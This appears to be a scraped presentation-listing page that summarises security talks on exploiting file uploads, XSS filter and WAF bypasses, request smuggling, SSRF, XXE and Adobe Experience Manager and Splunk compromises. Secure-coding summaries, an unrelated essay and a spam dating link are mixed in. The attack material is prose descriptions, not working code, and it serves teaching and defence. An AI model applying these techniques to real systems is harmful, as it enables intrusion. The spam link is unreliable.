"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
This talk shares the various techniques I found whilst building the XSS cheat sheet. It contains auto executing vectors, AngularJS CSP bypasses and dangling markup attacks.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
This document discusses vulnerabilities in WebSocket APIs. It begins with an introduction to the speaker and overview of WebSocket protocols. It then covers specific vulnerabilities like cross-site WebSocket hijacking, authentication issues, and request smuggling through WebSocket connections. The document demonstrates these vulnerabilities through challenges on public sites. It concludes with ideas for further research on WebSocket security.
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
This document provides an introduction to short file names (SFN) in Windows and discusses issues related to inadvertently disclosing SFNs through IIS. It begins with an overview of how SFNs work and how they map to long file names. It then discusses the history of SFN disclosure through IIS and how it can be abused to reveal sensitive file names. The document provides examples of automatically and manually enumerating SFNs to discover long file names. It concludes with tips and tricks for SFN enumeration along with examples of using it to reveal parts of unknown file names.
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep-dive in postMessage, how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.
This document summarizes HTTP request smuggling vulnerabilities. It explains how an attacker can craft a single HTTP request that is parsed differently by the frontend and backend servers, allowing the backend to interpret additional hidden requests. Several exploitation techniques and detection methods are described, including issues that can arise with HTTP/1, HTTP/2, and protocols like WebSockets. Automated testing tools have been developed but further research is still needed to fully understand and prevent these attacks.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
Nowadays REST APIs are behind each mobile and nearly all of web applications. As such they bring a wide range of possibilities in cases of communication and integration with given system. But with great power comes great responsibility. This talk aims to provide general guidance related do API security assessment and covers common API vulnerabilities. We will look at an API interface from the perspective of potential attacker.
I will show:
how to find hidden API interfaces
ways to detect available methods and parameters
fuzzing and pentesting techniques for API calls
typical problems
I will share several interesting cases from public bug bounty reports and personal experience, for example:
* how I got various credentials with one API call
* how to cause DoS by running Garbage Collector from API
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
The slides here are part of my presentation at the Confraria0day meeting in March 2017. It is an introduction to the various HTTP security headers with some insights about them. It covers HSTS, HPKP, X-Frame-Options, Content Security Policy, X-XSS-Protection, X-Content-Type-Options, Referrer-Policy and Set-Cookie options.
This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.
Making Joomla Insecure - Explaining security by breaking it
This document summarizes a presentation about making Joomla insecure and how to protect against common vulnerabilities. It demonstrates how to introduce vulnerabilities like SQL injection, local file inclusion, and cross-site scripting. It then provides tips to secure a Joomla site, such as sanitizing user input, updating to the latest version, using strong passwords, checking for file existence, and more. The goal is to make attendees aware of potential risks and how to properly secure a Joomla website.
This document provides an agenda for a ColdFusion security training session presented by Pete Freitag and David Epler. It includes introductions to the presenters and their backgrounds in ColdFusion and security. The agenda covers common ColdFusion vulnerabilities like file uploads, SQL injection, path traversals, and cross-site scripting. It also demonstrates the OWASP ZAP security tool and provides a sneak peek at a new ColdFusion security analyzer called Raijin/Blizzard. Hands-on lessons are included to allow participants to try exploiting vulnerabilities.
Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
This document provides an overview of Java EE 6 security best practices using the GlassFish application server. It begins with an introduction to the Galleria sample application and how it implements basic security features in Java EE 6 like form-based authentication and role-based authorization. The bulk of the document then summarizes the OWASP Top 10 security risks and provides recommendations for how to address each risk when developing Java EE 6 applications on GlassFish.
This document summarizes a presentation on Java EE 6 security best practices using the GlassFish application server. It discusses the OWASP Top 10 security risks and provides recommendations for how to address each one when developing applications on the Java EE 6 platform. Specific topics covered include injection, cross-site scripting, authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, failure to restrict URL access, insecure cryptographic storage, insufficient transport layer protection, and unvalidated redirects/forwards.
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Firmware analysis often involves searching firmware images for known file headers and file systems like SquashFS to extract contained files. Automated binary analysis tools like binwalk can help extract files from images. HTTP interfaces are common targets for security testing since they are often exposed without authentication. Testing may uncover vulnerabilities like XSS, CSRF, SQLi or command injection. Wireless interfaces also require testing to check for issues like weak encryption or exposure of credentials in cleartext.
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
This document discusses various cross-site scripting (XSS) evasion techniques and evaluates the effectiveness of popular XSS filters and intrusion detection systems (IDS), including ModSecurity, PHP-IDS, and Internet Explorer 8. It provides examples of how attacks can bypass these defenses by exploiting Unicode encoding, HTML/JavaScript tricks, and other methods. The author argues that most filters are ineffective at blocking all XSS variations and recommends ways to strengthen XSS filtering.
The document provides an overview of configuring and using Hibernate, an object-relational mapping tool for Java. It discusses downloading and setting up required libraries, configuring Hibernate properties and mappings, and examples of mapping Java objects to database tables for single entities, primary keys, one-to-many and many-to-many relationships, and reference data. Code samples and explanations are provided for saving, updating, and querying objects using Hibernate.
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
The document discusses the 8 most popular Joomla! hacks and how to avoid them. It summarizes that having an outdated Joomla! core, extensions, or themes are vulnerabilities that can be exploited. It also notes that using weak passwords, outdated server software, incorrectly configured server software, incorrect Joomla! file permissions, and malware can allow hackers access. The document provides tips to avoid these vulnerabilities such as always updating software, using strong unique passwords, properly configuring servers, setting correct file permissions, and using antivirus software.
This document summarizes best practices for securing Rails applications. It discusses potential information leaks from server headers, status pages, and Subversion metadata. It also covers vulnerabilities like cookie session storage, cross-site scripting (XSS), session fixation, cross-site request forgery (CSRF), SQL injection, and JavaScript hijacking. The document provides recommendations to address each issue, such as disabling server headers, preventing .svn access, using secure session storage, sanitizing user input, resetting sessions after login, validating CSRF tokens, and escaping values in SQL queries.
Distributed Automation(2018) - London Test Automation in Devops Meetup
This document discusses distributed automation (DA) for running UI tests across scaled cloud infrastructure using Selenium Grid Scaler on AWS. It covers: setting up Selenium Grid hub and nodes on AWS, different grid topologies for parallel testing, making the grid stable through timeouts and resources tuning, cost savings through autoscaling and large instance types, and a DA dashboard for monitoring tests. The goal of DA is to run hundreds of tests within the time of the slowest test case through parallelization and scalability.
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
Log data contains some of the most valuable raw information you can gather and analyze about your infrastructure and applications. Amid the mess of confusing lines of seemingly random text can be hints about performance, security, flaws in code, user access patterns, and other operational data. Without the proper tools, finding insights in these logs can be like searching for a hay-colored needle in a haystack. In this session you learn what practices and patterns you can easily implement that can help you better understand your log files. You see how you can customize web logs to add more information to them, how to digest logs from around your infrastructure, and how to analyze your log files in near real time.
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
Splunk forwarders were used to gain initial access to a network by exploiting their default credentials and REST API. This allowed deploying a malicious app that provided a shell. The shell was then used to pillage other systems by abusing credentials and data found in Chef scripts and GitHub repositories. Mitigations include changing default credentials, disabling the REST API on forwarders, improving logging and monitoring for unusual app deployments, using TLS for deployment server communications, and running Splunk in a less privileged manner.
This presentation was prepared for a Webcast where John Yerhot, Engine Yard US Support Lead, and Chris Kelly, Technical Evangelist at New Relic discussed how you can scale and improve the performance of your Ruby web apps. They shared detailed guidance on issues like:
Caching strategies
Slow database queries
Background processing
Profiling Ruby applications
Picking the right Ruby web server
Sharding data
Attendees will learn how to:
Gain visibility on site performance
Improve scalability and uptime
Find and fix key bottlenecks
See the on-demand replay:
http://pages.engineyard.com/6TipsforImprovingRubyApplicationPerformance.html
Crafting a compelling SEO proposal? Learn how to structure a winning SEO proposal template with essential elements and tips for client engagement. Elevate your SEO strategy with expert insights and examples
The advent of social media has revolutionized communication, transforming the way people connect, share, and interact globally. At the forefront of this digital revolution are visionary entrepreneurs who recognized the potential of the internet to foster social connections and create communities. This essay explores the founders of some of the most influential social media platforms, their journeys, and the lasting impact they have made on society.
Mark Zuckerberg, along with his college roommates Eduardo Saverin, Andrew McCollum, Dustin Moskovitz, and Chris Hughes, founded Facebook in 2004. Initially created as a social networking site for Harvard University students, Facebook rapidly expanded to other universities and eventually to the general public. Zuckerberg's vision was to create an online directory that connected people through their real-life social networks.
Twitter, founded in 2006 by Jack Dorsey, Biz Stone, and Evan Williams, brought a new dimension to social media with its microblogging platform. Dorsey envisioned a service that allowed users to share short, real-time updates, limited to 140 characters (now 280). This concise format encouraged rapid sharing of information and fostered a culture of brevity and immediacy.
Kevin Systrom and Mike Krieger co-founded Instagram in 2010, focusing on photo and video sharing. Systrom, who studied photography, wanted to create an app that made mobile photos look professional. The app's unique filters and easy-to-use interface quickly gained popularity, amassing over a million users within two months of its launch.
Instagram's emphasis on visual content has had a significant cultural impact. It has popularized the concept of influencers, giving rise to a new industry where individuals can monetize their popularity and reach. The platform has also revolutionized digital marketing, enabling brands to connect with consumers in more authentic and engaging ways. Acquired by Facebook in 2012, Instagram continues to be a dominant force in social media, shaping trends and cultural norms.
Reid Hoffman founded LinkedIn in 2002 with the goal of creating a professional networking platform. Unlike other social media sites focused on personal connections, LinkedIn was designed to connect professionals, facilitate job searches, and foster business relationships. The platform allows users to create professional profiles, network with colleagues, and share industry insights.
LinkedIn has become an indispensable tool for job seekers, recruiters, and businesses. It has transformed the job market by making it easier to find and connect with potential employers and employees. LinkedIn's influence extends beyond job searches; it has become a hub for professional development, thought leadership, and industry news. Hoffman's vision has significantly impacted how professionals manage their careers and build their networks.
Jan Koum and Brian Acton co-founded WhatsApp in 2009, aiming to create a simple, reliable..
International dating programhttps: please register here and start to meet new people todayhttps://www.digistore24.com/redir/384521/godtim/.
get started. https://www.digistore24.com/redir/384521/godtim/
Have you ever built a sandcastle at the beach, only to see it crumble when the tide comes in? In the digital world, our information is like that sandcastle, constantly under threat from waves of cyberattacks. A cybersecurity course is like learning to build a fortress for your information!
This course will teach you how to protect yourself from sneaky online characters who might try to steal your passwords, photos, or even mess with your computer. You'll learn about things like:
* **Spotting online traps:** Phishing emails that look real but could steal your info, and websites that might be hiding malware (like tiny digital monsters).
* **Building strong defenses:** Creating powerful passwords and keeping your software up-to-date, like putting a big, strong lock on your digital door.
* **Fighting back (safely):** Learning how to identify and avoid threats, and what to do if something does go wrong.
By the end of this course, you'll be a cybersecurity champion, ready to defend your digital world and keep your information safe and sound!
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
The document describes a methodology for discovering vulnerabilities in a fictional application with a microservices architecture. It involves mapping out all APIs, endpoints, subdomains and requests to extract a comprehensive list. Parameters are then fuzzed on all combinations to find unintended behaviors like old or unused endpoints exposing more data than intended, or endpoints making internal calls that can be exploited through server-side request forgery or path traversal. Examples are given of similar vulnerabilities discovered in real applications, such as an unused JSON API leaking private user data, path traversal through internal API calls, and account hijacking through improper protection of authentication keys.
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
This talk shares the various techniques I found whilst building the XSS cheat sheet. It contains auto executing vectors, AngularJS CSP bypasses and dangling markup attacks.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
This document discusses vulnerabilities in WebSocket APIs. It begins with an introduction to the speaker and overview of WebSocket protocols. It then covers specific vulnerabilities like cross-site WebSocket hijacking, authentication issues, and request smuggling through WebSocket connections. The document demonstrates these vulnerabilities through challenges on public sites. It concludes with ideas for further research on WebSocket security.
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
This document provides an introduction to short file names (SFN) in Windows and discusses issues related to inadvertently disclosing SFNs through IIS. It begins with an overview of how SFNs work and how they map to long file names. It then discusses the history of SFN disclosure through IIS and how it can be abused to reveal sensitive file names. The document provides examples of automatically and manually enumerating SFNs to discover long file names. It concludes with tips and tricks for SFN enumeration along with examples of using it to reveal parts of unknown file names.
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep-dive in postMessage, how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.
HTTP Request Smuggling via higher HTTP versionsneexemil
This document summarizes HTTP request smuggling vulnerabilities. It explains how an attacker can craft a single HTTP request that is parsed differently by the frontend and backend servers, allowing the backend to interpret additional hidden requests. Several exploitation techniques and detection methods are described, including issues that can arise with HTTP/1, HTTP/2, and protocols like WebSockets. Automated testing tools have been developed but further research is still needed to fully understand and prevent these attacks.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
Nowadays REST APIs are behind each mobile and nearly all of web applications. As such they bring a wide range of possibilities in cases of communication and integration with given system. But with great power comes great responsibility. This talk aims to provide general guidance related do API security assessment and covers common API vulnerabilities. We will look at an API interface from the perspective of potential attacker.
I will show:
how to find hidden API interfaces
ways to detect available methods and parameters
fuzzing and pentesting techniques for API calls
typical problems
I will share several interesting cases from public bug bounty reports and personal experience, for example:
* how I got various credentials with one API call
* how to cause DoS by running Garbage Collector from API
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
The slides here are part of my presentation at the Confraria0day meeting in March 2017. It is an introduction to the various HTTP security headers with some insights about them. It covers HSTS, HPKP, X-Frame-Options, Content Security Policy, X-XSS-Protection, X-Content-Type-Options, Referrer-Policy and Set-Cookie options.
This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.
Making Joomla Insecure - Explaining security by breaking itTim Plummer
This document summarizes a presentation about making Joomla insecure and how to protect against common vulnerabilities. It demonstrates how to introduce vulnerabilities like SQL injection, local file inclusion, and cross-site scripting. It then provides tips to secure a Joomla site, such as sanitizing user input, updating to the latest version, using strong passwords, checking for file existence, and more. The goal is to make attendees aware of potential risks and how to properly secure a Joomla website.
This document provides an agenda for a ColdFusion security training session presented by Pete Freitag and David Epler. It includes introductions to the presenters and their backgrounds in ColdFusion and security. The agenda covers common ColdFusion vulnerabilities like file uploads, SQL injection, path traversals, and cross-site scripting. It also demonstrates the OWASP ZAP security tool and provides a sneak peek at a new ColdFusion security analyzer called Raijin/Blizzard. Hands-on lessons are included to allow participants to try exploiting vulnerabilities.
Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
Slides for the #JavaOne Session ID: CON11881Masoud Kalali
This document provides an overview of Java EE 6 security best practices using the GlassFish application server. It begins with an introduction to the Galleria sample application and how it implements basic security features in Java EE 6 like form-based authentication and role-based authorization. The bulk of the document then summarizes the OWASP Top 10 security risks and provides recommendations for how to address each risk when developing Java EE 6 applications on GlassFish.
Java EE 6 Security in practice with GlassFishMarkus Eisele
This document summarizes a presentation on Java EE 6 security best practices using the GlassFish application server. It discusses the OWASP Top 10 security risks and provides recommendations for how to address each one when developing applications on the Java EE 6 platform. Specific topics covered include injection, cross-site scripting, authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, failure to restrict URL access, insecure cryptographic storage, insufficient transport layer protection, and unvalidated redirects/forwards.
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
Firmware analysis often involves searching firmware images for known file headers and file systems like SquashFS to extract contained files. Automated binary analysis tools like binwalk can help extract files from images. HTTP interfaces are common targets for security testing since they are often exposed without authentication. Testing may uncover vulnerabilities like XSS, CSRF, SQLi or command injection. Wireless interfaces also require testing to check for issues like weak encryption or exposure of credentials in cleartext.
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
This document discusses various cross-site scripting (XSS) evasion techniques and evaluates the effectiveness of popular XSS filters and intrusion detection systems (IDS), including ModSecurity, PHP-IDS, and Internet Explorer 8. It provides examples of how attacks can bypass these defenses by exploiting Unicode encoding, HTML/JavaScript tricks, and other methods. The author argues that most filters are ineffective at blocking all XSS variations and recommends ways to strengthen XSS filtering.
The document provides an overview of configuring and using Hibernate, an object-relational mapping tool for Java. It discusses downloading and setting up required libraries, configuring Hibernate properties and mappings, and examples of mapping Java objects to database tables for single entities, primary keys, one-to-many and many-to-many relationships, and reference data. Code samples and explanations are provided for saving, updating, and querying objects using Hibernate.
The top 10 security issues in web applicationsDevnology
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
8 Most Popular Joomla Hacks & How To Avoid ThemSiteGround.com
The document discusses the 8 most popular Joomla! hacks and how to avoid them. It summarizes that having an outdated Joomla! core, extensions, or themes are vulnerabilities that can be exploited. It also notes that using weak passwords, outdated server software, incorrectly configured server software, incorrect Joomla! file permissions, and malware can allow hackers access. The document provides tips to avoid these vulnerabilities such as always updating software, using strong unique passwords, properly configuring servers, setting correct file permissions, and using antivirus software.
This document summarizes best practices for securing Rails applications. It discusses potential information leaks from server headers, status pages, and Subversion metadata. It also covers vulnerabilities like cookie session storage, cross-site scripting (XSS), session fixation, cross-site request forgery (CSRF), SQL injection, and JavaScript hijacking. The document provides recommendations to address each issue, such as disabling server headers, preventing .svn access, using secure session storage, sanitizing user input, resetting sessions after login, validating CSRF tokens, and escaping values in SQL queries.
Distributed Automation(2018) - London Test Automation in Devops Meetuparagavan
This document discusses distributed automation (DA) for running UI tests across scaled cloud infrastructure using Selenium Grid Scaler on AWS. It covers: setting up Selenium Grid hub and nodes on AWS, different grid topologies for parallel testing, making the grid stable through timeouts and resources tuning, cost savings through autoscaling and large instance types, and a DA dashboard for monitoring tests. The goal of DA is to run hundreds of tests within the time of the slowest test case through parallelization and scalability.
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014Amazon Web Services
Log data contains some of the most valuable raw information you can gather and analyze about your infrastructure and applications. Amid the mess of confusing lines of seemingly random text can be hints about performance, security, flaws in code, user access patterns, and other operational data. Without the proper tools, finding insights in these logs can be like searching for a hay-colored needle in a haystack. In this session you learn what practices and patterns you can easily implement that can help you better understand your log files. You see how you can customize web logs to add more information to them, how to digest logs from around your infrastructure, and how to analyze your log files in near real time.
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
Splunk forwarders were used to gain initial access to a network by exploiting their default credentials and REST API. This allowed deploying a malicious app that provided a shell. The shell was then used to pillage other systems by abusing credentials and data found in Chef scripts and GitHub repositories. Mitigations include changing default credentials, disabling the REST API on forwarders, improving logging and monitoring for unusual app deployments, using TLS for deployment server communications, and running Splunk in a less privileged manner.
This presentation was prepared for a Webcast where John Yerhot, Engine Yard US Support Lead, and Chris Kelly, Technical Evangelist at New Relic discussed how you can scale and improve the performance of your Ruby web apps. They shared detailed guidance on issues like:
Caching strategies
Slow database queries
Background processing
Profiling Ruby applications
Picking the right Ruby web server
Sharding data
Attendees will learn how to:
Gain visibility on site performance
Improve scalability and uptime
Find and fix key bottlenecks
See the on-demand replay:
http://pages.engineyard.com/6TipsforImprovingRubyApplicationPerformance.html
